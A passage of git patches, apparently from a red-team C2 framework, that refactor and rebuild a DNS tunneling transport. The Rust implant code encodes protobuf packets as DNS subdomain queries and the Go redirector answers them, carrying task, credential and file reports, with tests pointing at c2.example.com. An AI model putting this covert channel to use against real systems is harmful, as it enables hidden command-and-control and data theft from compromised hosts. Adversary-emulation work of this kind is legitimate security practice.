impl DNS { let crc_match = if is_text_chunking { actual_crc == expected_crc } else { - (actual_crc & 0xFF) == (expected_crc & 0xFF) + (actual_crc & CRC16_LOW_BYTE_MASK) == (expected_crc & CRC16_LOW_BYTE_MASK) }; if !crc_match { @@ -1262,7 +1317,7 @@ impl Transport for DNS { // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback // dns://*/c2.example.com?type=A - System resolver, prefer A records // dns://*/c2.example.com?fallback=false - TXT only, no fallback - let url = callback.trim_start_matches("dns://"); + let url = callback.trim_start_matches(URL_SCHEME_PREFIX); // Split URL and query params let (server_domain, query_params) = if let Some(idx) = url.find('?') { @@ -1279,13 +1334,13 @@ impl Transport for DNS { )); } - let dns_server = if parts[0] == "*" { + let dns_server = if parts[0] == SYSTEM_RESOLVER_WILDCARD { // Use system resolver None } else if parts[0].contains(':') { Some(parts[0].to_string()) } else { - Some(format!("{}:53", parts[0])) + Some(format!("{}:{}", parts[0], DEFAULT_DNS_PORT)) }; let base_domain = parts[1].to_string(); @@ -1433,10 +1488,11 @@ impl Transport for DNS { // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); - #[cfg_attr(not(debug_assertions), allow(unused_variables))] - let mut chunk_count = 0; // Iterate over the sync channel receiver in a spawned task to avoid blocking + #[cfg(debug_assertions)] + let mut chunk_count = 0; + for chunk in request { #[cfg(debug_assertions)] { @@ -1725,18 +1781,33 @@ mod tests { fn test_dns_new_with_wildcard_builds_resolver_array() { let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - assert!(dns.dns_server.is_none(), "dns_server should be None for wildcard"); - assert!(!dns.dns_resolvers.is_empty(), "dns_resolvers array should be populated"); + assert!( + dns.dns_server.is_none(), + "dns_server should be None for wildcard" + ); + assert!( + 
!dns.dns_resolvers.is_empty(), + "dns_resolvers array should be populated" + ); // Should always have at least Cloudflare and Google fallbacks - assert!(dns.dns_resolvers.len() >= 2, "Should have at least 2 resolvers (fallbacks)"); + assert!( + dns.dns_resolvers.len() >= 2, + "Should have at least 2 resolvers (fallbacks)" + ); // Check that Cloudflare and Google are in the list (they should be at the end) let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); - assert!(has_cloudflare, "Should have Cloudflare (1.1.1.1:53) in resolver list"); - assert!(has_google, "Should have Google (8.8.8.8:53) in resolver list"); + assert!( + has_cloudflare, + "Should have Cloudflare (1.1.1.1:53) in resolver list" + ); + assert!( + has_google, + "Should have Google (8.8.8.8:53) in resolver list" + ); assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); @@ -1749,6 +1820,9 @@ mod tests { let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - assert!(dns.dns_resolvers.is_empty(), "dns_resolvers should be empty with explicit server"); + assert!( + dns.dns_resolvers.is_empty(), + "dns_resolvers should be empty with explicit server" + ); } } diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 26702282b..8e1a04861 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -52,6 +52,29 @@ const ( // Response size limits (to fit in single UDP packet) maxDNSResponseSize = 1400 // Conservative MTU limit maxResponseChunkSize = 1200 // Base32-encoded chunk size + + // DNS response constants + dnsResponseFlags = 0x8180 // Flags: Response, no error (0x81, 0x80) + dnsErrorFlags = 0x8183 // Flags: Response with name error (0x81, 0x83) + dnsPointerToQuestion = 0xC00C // Compression pointer to question at offset 12 + 
dnsTTLSeconds = 60 // DNS record TTL in seconds + txtMaxChunkSize = 255 // Maximum size of single TXT string + + // Localhost IP addresses (for benign responses) + localhostIPv4Octet1 = 127 + localhostIPv4Octet4 = 1 + localhostIPv6Byte15 = 1 // ::1 has only byte 15 set to 1, rest are 0 + + // Base36 encoding constants + base36Radix = 36 + base36Pow2 = 1296 // 36^2 + base36Pow3 = 46656 // 36^3 + base36Pow4 = 1679616 // 36^4 + + // CRC16-CCITT constants + crc16Init = 0xFFFF + crc16Polynomial = 0x1021 + crc16HighBit = 0x8000 ) func init() { @@ -832,11 +855,11 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans // DNS Header response = append(response, byte(transactionID>>8), byte(transactionID)) - response = append(response, 0x81, 0x80) // Flags: Response, no error - response = append(response, 0x00, 0x01) // Questions: 1 - response = append(response, 0x00, 0x01) // Answers: 1 - response = append(response, 0x00, 0x00) // Authority RRs: 0 - response = append(response, 0x00, 0x00) // Additional RRs: 0 + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) // Flags: Response, no error + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, 0x00, 0x01) // Answers: 1 + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 // Question section (echo the question) for _, label := range strings.Split(domain, ".") { @@ -852,26 +875,26 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans // Answer section // Name (pointer to question) - response = append(response, 0xC0, 0x0C) + response = append(response, byte(dnsPointerToQuestion>>8), byte(dnsPointerToQuestion&0xFF)) // Type: echo query type response = append(response, 0x00, byte(queryType)) // Class: IN response = append(response, 0x00, byte(dnsClassIN)) - // TTL: 60 seconds - response = append(response, 0x00, 0x00, 0x00, 0x3C) + // 
TTL: dnsTTLSeconds + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // Build RDATA based on query type var rdata []byte switch queryType { case txtRecordType: - // TXT record: split data into 255-byte chunks + // TXT record: split data into txtMaxChunkSize-byte chunks txtData := data var txtChunks [][]byte for len(txtData) > 0 { chunkSize := len(txtData) - if chunkSize > 255 { - chunkSize = 255 + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize } txtChunks = append(txtChunks, txtData[:chunkSize]) txtData = txtData[chunkSize:] @@ -923,22 +946,21 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { response := make([]byte, dnsHeaderSize) binary.BigEndian.PutUint16(response[0:2], transactionID) - response[2] = 0x81 - response[3] = 0x83 // RCODE: Name Error + response[2] = byte(dnsErrorFlags >> 8) + response[3] = byte(dnsErrorFlags & 0xFF) // RCODE: Name Error conn.WriteToUDP(response, addr) } // sendBenignResponse sends a benign DNS response for resolver queries -// Returns 127.0.0.1 for A, ::1 for AAAA, empty TXT for others func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { var data []byte switch queryType { case aRecordType: - data = []byte{127, 0, 0, 1} // localhost + data = []byte{localhostIPv4Octet1, 0, 0, localhostIPv4Octet4} // 127.0.0.1 case aaaaRecordType: data = make([]byte, 16) // ::1 - data[15] = 1 + data[localhostIPv6Byte15] = localhostIPv6Byte15 default: data = []byte{} // empty response } @@ -981,8 +1003,8 @@ func encodeBase36(value int, digits int) string { const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" result := make([]byte, digits) for i := digits - 1; i >= 0; i-- { - result[i] = base36[value%36] - value /= 36 + result[i] = base36[value%base36Radix] + value /= base36Radix } return string(result) } 
@@ -1006,7 +1028,7 @@ func decodeBase36(encoded string) (int, error) { if err != nil { return 0, err } - result = result*36 + digit + result = result*base36Radix + digit } return result, nil } @@ -1037,14 +1059,14 @@ func decodeBase36CRC(encoded string) (int, error) { return decodeBase36(encoded) } -// CalculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +// CalculateCRC16 computes CRC16-CCITT checksum func CalculateCRC16(data []byte) uint16 { - var crc uint16 = 0xFFFF + var crc uint16 = crc16Init for _, b := range data { crc ^= uint16(b) << 8 for i := 0; i < 8; i++ { - if (crc & 0x8000) != 0 { - crc = (crc << 1) ^ 0x1021 + if (crc & crc16HighBit) != 0 { + crc = (crc << 1) ^ crc16Polynomial } else { crc <<= 1 } From 49f809955088ceb8c5bf3f4c92bf53249ae5adf3 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 21:17:29 -0600 Subject: [PATCH 05/17] updated to dns protobuf --- implants/lib/pb/build.rs | 14 + implants/lib/pb/src/generated/dns.rs | 100 ++ implants/lib/pb/src/lib.rs | 3 + implants/lib/transport/Cargo.toml | 5 +- implants/lib/transport/src/dns.rs | 2062 ++++++------------------ tavern/internal/c2/dnspb/dns.pb.go | 414 +++++ tavern/internal/c2/generate.go | 1 + tavern/internal/c2/proto/dns.proto | 45 + tavern/internal/redirectors/dns/dns.go | 1087 +++++-------- 9 files changed, 1424 insertions(+), 2307 deletions(-) create mode 100644 implants/lib/pb/src/generated/dns.rs create mode 100644 tavern/internal/c2/dnspb/dns.pb.go create mode 100644 tavern/internal/c2/proto/dns.proto diff --git a/implants/lib/pb/build.rs b/implants/lib/pb/build.rs index cfff81dac..5acc469bd 100644 --- a/implants/lib/pb/build.rs +++ b/implants/lib/pb/build.rs @@ -109,5 +109,19 @@ fn main() -> Result<(), Box> { Ok(_) => println!("generated c2 protos"), }; + // Build DNS Protos (no encryption codec - used for transport layer only) + match tonic_build::configure() + .out_dir("./src/generated") + 
.build_server(false) + .build_client(false) + .compile(&["dns.proto"], &["../../../tavern/internal/c2/proto/"]) + { + Err(err) => { + println!("WARNING: Failed to compile dns protos: {}", err); + panic!("{}", err); + } + Ok(_) => println!("generated dns protos"), + }; + Ok(()) } diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs new file mode 100644 index 000000000..452de3d5e --- /dev/null +++ b/implants/lib/pb/src/generated/dns.rs @@ -0,0 +1,100 @@ +// This file is @generated by prost-build. +/// DNSPacket is the main message format for DNS C2 communication +/// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct DnsPacket { + /// Packet type + #[prost(enumeration = "PacketType", tag = "1")] + pub r#type: i32, + /// Chunk sequence number (0-based) + #[prost(uint32, tag = "2")] + pub sequence: u32, + /// 12-character random conversation ID + #[prost(string, tag = "3")] + pub conversation_id: ::prost::alloc::string::String, + /// Chunk payload (or InitPayload for INIT packets) + #[prost(bytes = "vec", tag = "4")] + pub data: ::prost::alloc::vec::Vec, + /// Optional CRC32 for validation + #[prost(uint32, tag = "5")] + pub crc32: u32, +} +/// InitPayload is the payload for INIT packets +/// It contains metadata about the upcoming data transmission +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct InitPayload { + /// 2-character gRPC method code (e.g., "ct", "fa") + #[prost(string, tag = "1")] + pub method_code: ::prost::alloc::string::String, + /// Total number of data chunks to expect + #[prost(uint32, tag = "2")] + pub total_chunks: u32, + /// CRC32 checksum of complete request data + #[prost(uint32, tag = "3")] + pub data_crc32: u32, +} +/// FetchPayload is the payload for FETCH packets +/// It specifies which response chunk 
to retrieve +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct FetchPayload { + /// Which chunk to fetch (0-based) + #[prost(uint32, tag = "1")] + pub chunk_index: u32, +} +/// ResponseMetadata indicates the response is chunked and must be fetched +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ResponseMetadata { + /// Total number of response chunks + #[prost(uint32, tag = "1")] + pub total_chunks: u32, + /// CRC32 checksum of complete response data + #[prost(uint32, tag = "2")] + pub data_crc32: u32, + /// Size of each chunk (last may be smaller) + #[prost(uint32, tag = "3")] + pub chunk_size: u32, +} +/// PacketType defines the type of DNS packet in the conversation +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] +#[repr(i32)] +pub enum PacketType { + Unspecified = 0, + /// Establish conversation + Init = 1, + /// Send data chunk + Data = 2, + /// Finalize request + End = 3, + /// Retrieve response chunk + Fetch = 4, +} +impl PacketType { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", + PacketType::Init => "PACKET_TYPE_INIT", + PacketType::Data => "PACKET_TYPE_DATA", + PacketType::End => "PACKET_TYPE_END", + PacketType::Fetch => "PACKET_TYPE_FETCH", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. 
+ pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), + "PACKET_TYPE_INIT" => Some(Self::Init), + "PACKET_TYPE_DATA" => Some(Self::Data), + "PACKET_TYPE_END" => Some(Self::End), + "PACKET_TYPE_FETCH" => Some(Self::Fetch), + _ => None, + } + } +} diff --git a/implants/lib/pb/src/lib.rs b/implants/lib/pb/src/lib.rs index f65dc9036..a1c4efaea 100644 --- a/implants/lib/pb/src/lib.rs +++ b/implants/lib/pb/src/lib.rs @@ -4,5 +4,8 @@ pub mod eldritch { pub mod c2 { include!("generated/c2.rs"); } +pub mod dns { + include!("generated/dns.rs"); +} pub mod config; pub mod xchacha; diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index a13831abb..cbda42e4e 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,7 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] -dns = ["dep:data-encoding", "dep:rand", "dep:hickory-resolver"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] mock = ["dep:mockall"] [dependencies] @@ -28,8 +28,9 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -data-encoding = { version = "2.9.0", optional = true } +base32 = { version = "0.5", optional = true } rand = { workspace = true, optional = true } +url = { version = "2.5", optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index a7fcf4ca1..3850d19a5 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,1436 +1,586 @@ -use anyhow::{Context, Result}; +// DNS transport implementation for Realm C2 
+// This module provides DNS-based communication with stateless packet protocol + +use anyhow::Result; use pb::c2::*; +use pb::dns::*; use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; - -#[cfg(feature = "dns")] -use hickory_resolver::system_conf::read_system_conf; - use crate::Transport; -// DNS protocol limits -const DNS_HEADER_SIZE: usize = 12; // Standard DNS header size -const MAX_LABEL_LENGTH: usize = 63; // Maximum bytes in a DNS label -const TXT_RECORD_TYPE: u16 = 16; // TXT record QTYPE -const A_RECORD_TYPE: u16 = 1; // A record QTYPE -const AAAA_RECORD_TYPE: u16 = 28; // AAAA record QTYPE -const DNS_CLASS_IN: u16 = 1; // Internet class - -// Record type fallback priority (TXT has highest capacity) -const RECORD_TYPE_PRIORITY: &[u16] = &[TXT_RECORD_TYPE, AAAA_RECORD_TYPE, A_RECORD_TYPE]; - -// Protocol field sizes (base36 encoding) -const TYPE_SIZE: usize = 1; // Packet type: i/d/e/f -const SEQ_SIZE: usize = 5; // Sequence: 36^5 = 60,466,176 max chunks -const CONV_ID_SIZE: usize = 12; // Conversation ID length -const HEADER_SIZE: usize = TYPE_SIZE + SEQ_SIZE + CONV_ID_SIZE; -const MAX_DNS_NAME_LEN: usize = 253; // DNS max total domain name length - -// Packet types -const TYPE_INIT: char = 'i'; // Init: establish conversation -const TYPE_DATA: char = 'd'; // Data: send chunk -const TYPE_END: char = 'e'; // End: finalize and process -const TYPE_FETCH: char = 'f'; // Fetch: retrieve response chunk - -// Response prefixes (TXT records) -const RESP_OK: &str = "ok:"; // Success with data -const RESP_MISSING: &str = "m:"; // Missing chunks list -const RESP_ERROR: &str = "e:"; // Error message -const RESP_CHUNKED: &str = "r:"; // Response chunked metadata - -// Retry configuration -const MAX_RETRIES: usize = 5; -const INIT_TIMEOUT_SECS: u64 = 15; -const CHUNK_TIMEOUT_SECS: u64 = 20; - -// DNS query configuration -const MAX_DNS_PACKET_SIZE: usize = 4096; // Maximum DNS response size -const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // 
Timeout for individual DNS queries - -// DNS server configuration -const DEFAULT_DNS_PORT: &str = "53"; -const FALLBACK_DNS_CLOUDFLARE: &str = "1.1.1.1"; -const FALLBACK_DNS_GOOGLE: &str = "8.8.8.8"; - -// Base36 encoding math constants (for sequence and CRC encoding) -const BASE36_RADIX: usize = 36; -const BASE36_POW_2: usize = 1296; // 36^2 -const BASE36_POW_3: usize = 46656; // 36^3 -const BASE36_POW_4: usize = 1679616; // 36^4 - -// CRC16-CCITT constants -const CRC16_INIT: u16 = 0xFFFF; -const CRC16_POLYNOMIAL: u16 = 0x1021; -const CRC16_HIGH_BIT: u16 = 0x8000; -const CRC16_LOW_BYTE_MASK: u16 = 0xFF; - -// DNS protocol constants -const DNS_QUERY_FLAG_STANDARD: [u8; 2] = [0x01, 0x00]; -const DNS_COMPRESSION_PTR_MASK: u8 = 0xC0; -const DNS_RCODE_MASK: u8 = 0x0F; - -// Retry and timing constants -const MAX_MISSING_CHUNK_RETRIES: usize = 5; -const MAX_CHUNKED_INDICATOR_FETCHES: usize = 10; -const MISSING_CHUNK_DELAY_MS: u64 = 50; -const BACKOFF_BASE_SECS: u64 = 1; -const BACKOFF_RETRY_DELAY_SECS: u64 = 2; - -// Label size calculation constants -const DNS_LABEL_OVERHEAD_DIVISOR: usize = 64; -const DNS_LABEL_USABLE_RATIO: usize = 63; - -// Base32 encoding ratio (8 bits to 5 bits, so 8/5 expansion) -const BASE32_ENCODE_NUMERATOR: usize = 8; -const BASE32_ENCODE_DENOMINATOR: usize = 5; - -// Binary chunking indicator -const BINARY_CHUNK_MAGIC: u8 = 0xFF; - -// URL parsing constants -const URL_SCHEME_PREFIX: &str = "dns://"; -const SYSTEM_RESOLVER_WILDCARD: &str = "*"; - -// gRPC method paths -static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; -static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; -static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; -static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; -static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; -static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; - -fn marshal_with_codec(msg: Req) -> Result> -where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 
'static, -{ - pb::xchacha::encode_with_chacha::(msg) -} - -fn unmarshal_with_codec(data: &[u8]) -> Result -where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 'static, -{ - pb::xchacha::decode_with_chacha::(data) -} +// Protocol limits +const MAX_LABEL_LENGTH: usize = 63; +const MAX_DNS_NAME_LENGTH: usize = 253; +const CONV_ID_LENGTH: usize = 8; -/// Build resolver array: system DNS servers (if available) + fallback servers -/// Returns array with system servers first, then 1.1.1.1:53, then 8.8.8.8:53 -/// If system config fails, returns only [1.1.1.1:53, 8.8.8.8:53] -fn build_resolver_array() -> Vec { - let mut resolvers = Vec::new(); - - // Try to get system DNS servers - #[cfg(feature = "dns")] - match read_system_conf() { - Ok((config, _opts)) => { - // Extract nameserver addresses from system config - for ns in config.name_servers() { - let addr = ns.socket_addr; - let server = format!("{}:{}", addr.ip(), addr.port()); - - // Only add if not already in the list (deduplicate) - if !resolvers.contains(&server) { - resolvers.push(server); - } - } - - #[cfg(debug_assertions)] - if !resolvers.is_empty() { - log::debug!( - "Found {} system DNS servers: {:?}", - resolvers.len(), - resolvers - ); - } else { - log::debug!("System DNS config returned no servers"); - } - } - Err(_e) => { - #[cfg(debug_assertions)] - log::debug!("Failed to read system DNS config: {}", _e); - } - } - - // Always add fallback servers (Cloudflare and Google) - // Add only if not already in the list - let fallbacks = vec![ - format!("{}:{}", FALLBACK_DNS_CLOUDFLARE, DEFAULT_DNS_PORT), - format!("{}:{}", FALLBACK_DNS_GOOGLE, DEFAULT_DNS_PORT), - ]; - for fallback in fallbacks { - if !resolvers.contains(&fallback) { - resolvers.push(fallback); - } - } - - resolvers -} +// DNS resolver fallbacks +const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; -/// Map gRPC method path to 2-character code -/// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, 
-/// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput -fn method_to_code(method: &str) -> String { - match method { - "/c2.C2/ClaimTasks" => "ct".to_string(), - "/c2.C2/FetchAsset" => "fa".to_string(), - "/c2.C2/ReportCredential" => "rc".to_string(), - "/c2.C2/ReportFile" => "rf".to_string(), - "/c2.C2/ReportProcessList" => "rp".to_string(), - "/c2.C2/ReportTaskOutput" => "rt".to_string(), - _ => "ct".to_string(), - } +/// DNS record type for queries +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum DnsRecordType { + TXT, // Text records (default, base32 encoded) + A, // IPv4 address records (binary data) + AAAA, // IPv6 address records (binary data) } -/// DNS transport implementation -/// -/// Tunnels C2 traffic through DNS queries and responses using a -/// conversation-based protocol with init, data, end, and fetch packets. -/// Supports TXT, A, and AAAA record types with automatic fallback. +/// DNS transport using stateless packet protocol with protobuf #[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // Some(server) = use explicit server, None = use resolver array - dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None - current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, - socket: Option>, - preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) - current_record_type: u16, // Current type (may change after fallback) - enable_fallback: bool, // Whether to try other types on failure + dns_servers: Vec, // Primary + fallback DNS servers + current_server_index: usize, + record_type: DnsRecordType, // DNS record type to use for queries } impl DNS { - /// Calculate maximum data size per chunk - /// After base32-encoding entire packet [type:1][seq:5][convid:12][data...] 
- /// Base32 expands by 8/5 = 1.6x, so work backwards from DNS name limit - fn calculate_max_data_size(&self) -> usize { - let base_with_dot = self.base_domain.len() + 1; - let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); - - // Account for dots between labels (every 63 chars needs a dot separator) - // If we have N chars, we need ceil(N/63) - 1 dots - // To be safe, estimate: for every 63 chars, we lose 1 char to a dot - // So effective available space is: total_available * 63 / 64 - let effective_available = - (total_available * DNS_LABEL_USABLE_RATIO) / DNS_LABEL_OVERHEAD_DIVISOR; - - // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available - // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = - (effective_available * BASE32_ENCODE_DENOMINATOR) / BASE32_ENCODE_NUMERATOR; - max_raw_packet.saturating_sub(HEADER_SIZE) + /// Marshal request using ChaCha encoding + fn marshal_with_codec(msg: Req) -> Result> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::encode_with_chacha::(msg) } - /// Generate a random conversation ID + /// Unmarshal response using ChaCha encoding + fn unmarshal_with_codec(data: &[u8]) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::decode_with_chacha::(data) + } + + /// Generate unique conversation ID fn generate_conv_id() -> String { use rand::Rng; + const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789"; let mut rng = rand::thread_rng(); - let bytes: [u8; 8] = rng.gen(); - Self::encode_base32(&bytes)[..CONV_ID_SIZE].to_string() - } - - fn encode_seq(seq: usize) -> String { - const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let digit4 = (seq / BASE36_POW_4) % BASE36_RADIX; - let digit3 = (seq / BASE36_POW_3) % BASE36_RADIX; - let digit2 = (seq / BASE36_POW_2) % BASE36_RADIX; - let digit1 = (seq / BASE36_RADIX) % 
BASE36_RADIX; - let digit0 = seq % BASE36_RADIX; - format!( - "{}{}{}{}{}", - BASE36[digit4] as char, - BASE36[digit3] as char, - BASE36[digit2] as char, - BASE36[digit1] as char, - BASE36[digit0] as char - ) - } - - fn decode_seq(encoded: &str) -> Result { - let chars: Vec = encoded.chars().collect(); - if chars.len() != 5 { - return Err(anyhow::anyhow!( - "Invalid sequence length: expected 5, got {}", - chars.len() - )); - } - - let val = |c: char| -> Result { - match c { - '0'..='9' => Ok((c as usize) - ('0' as usize)), - 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), - _ => Err(anyhow::anyhow!("Invalid base36 character")), - } - }; - - Ok(val(chars[0])? * BASE36_POW_4 - + val(chars[1])? * BASE36_POW_3 - + val(chars[2])? * BASE36_POW_2 - + val(chars[3])? * BASE36_RADIX - + val(chars[4])?) - } - - /// Calculate CRC16-CCITT checksum - fn calculate_crc16(data: &[u8]) -> u16 { - let mut crc: u16 = CRC16_INIT; - for byte in data { - crc ^= (*byte as u16) << 8; + (0..CONV_ID_LENGTH) + .map(|_| { + let idx = rng.gen_range(0..CHARSET.len()); + CHARSET[idx] as char + }) + .collect() + } + + /// Calculate CRC32 checksum + fn calculate_crc32(data: &[u8]) -> u32 { + let mut crc = 0xffffffffu32; + for &byte in data { + crc ^= byte as u32; for _ in 0..8 { - if (crc & CRC16_HIGH_BIT) != 0 { - crc = (crc << 1) ^ CRC16_POLYNOMIAL; + if crc & 1 != 0 { + crc = (crc >> 1) ^ 0xedb88320; } else { - crc <<= 1; + crc >>= 1; } } } - crc + !crc } - /// Encode CRC16 to 4-digit base36 (for init payload and response metadata only) - fn encode_base36_crc(crc: u16) -> String { - const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let crc_val = crc as usize; - let digit3 = (crc_val / BASE36_POW_3) % BASE36_RADIX; - let digit2 = (crc_val / BASE36_POW_2) % BASE36_RADIX; - let digit1 = (crc_val / BASE36_RADIX) % BASE36_RADIX; - let digit0 = crc_val % BASE36_RADIX; - format!( - "{}{}{}{}", - BASE36[digit3] as char, - BASE36[digit2] as char, - BASE36[digit1] as char, - 
BASE36[digit0] as char - ) - } + /// Calculate maximum data size that will fit in DNS query + fn calculate_max_chunk_size(&self) -> usize { + // DNS limit: total_length <= 253 + // Format: . + // total_length = encoded_length + num_dots + base_domain_length + // num_dots = ceil(encoded_length / 63) - 1 + 1 = ceil(encoded_length / 63) - /// Decode 4-digit base36 CRC - fn decode_base36_crc(encoded: &str) -> Result { - let chars: Vec = encoded.chars().collect(); - if chars.len() != 4 { - return Err(anyhow::anyhow!( - "Invalid CRC length: expected 4, got {}", - chars.len() - )); - } + let base_domain_len = self.base_domain.len(); - let val = |c: char| -> Result { - match c { - '0'..='9' => Ok((c as usize) - ('0' as usize)), - 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), - _ => Err(anyhow::anyhow!("Invalid base36 character in CRC")), - } - }; + // Available for encoded data and its dots + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len + 1); // +1 for dot before base_domain - let crc = val(chars[0])? * BASE36_POW_3 - + val(chars[1])? * BASE36_POW_2 - + val(chars[2])? 
* BASE36_RADIX - + val(chars[3])?; - Ok(crc as u16) - } + // For every 63 chars of encoded data, we need 1 dot + // So: encoded_length + ceil(encoded_length / 63) <= available + // Rearranging: encoded_length <= available * 63 / 64 + let max_encoded_length = (available * 63) / 64; + + // Base32 encoding: 5 bytes -> 8 chars + // So: encoded_length = ceil(protobuf_length * 8 / 5) + // Rearranging: protobuf_length = floor(encoded_length * 5 / 8) + let max_protobuf_length = (max_encoded_length * 5) / 8; - /// Encode data to lowercase base32 without padding - fn encode_base32(data: &[u8]) -> String { - use data_encoding::BASE32_NOPAD; - BASE32_NOPAD.encode(data).to_lowercase() + // Protobuf overhead: + // - type: 1 byte tag + 1 byte value = 2 bytes + // - sequence: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes + // - conversation_id: 1 byte tag + 1 byte length + 8 bytes string = 10 bytes + // - data: 1 byte tag + varint length (1-2 bytes for our sizes) = 3 bytes + // - crc32: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes + // Total: 2 + 4 + 10 + 3 + 4 = 23 bytes + const PROTOBUF_FIXED_OVERHEAD: usize = 23; + + // Max data size is exactly what fits + max_protobuf_length.saturating_sub(PROTOBUF_FIXED_OVERHEAD) } - /// Decode lowercase base32 data without padding - fn decode_base32(encoded: &str) -> Result> { - use data_encoding::BASE32_NOPAD; - BASE32_NOPAD - .decode(encoded.to_uppercase().as_bytes()) - .context("Failed to decode base32") + /// Encode data using Base32 (DNS-safe, case-insensitive) + fn encode_data(data: &[u8]) -> String { + // Use RFC4648 alphabet (A-Z, 2-7) without padding, converted to lowercase + base32::encode(base32::Alphabet::Rfc4648 { padding: false }, data).to_lowercase() } - /// Build packet subdomain with opaque base32 encoding - /// Entire packet structure is base32-encoded: [type:1][seq:5][convid:12][raw_data_bytes...] 
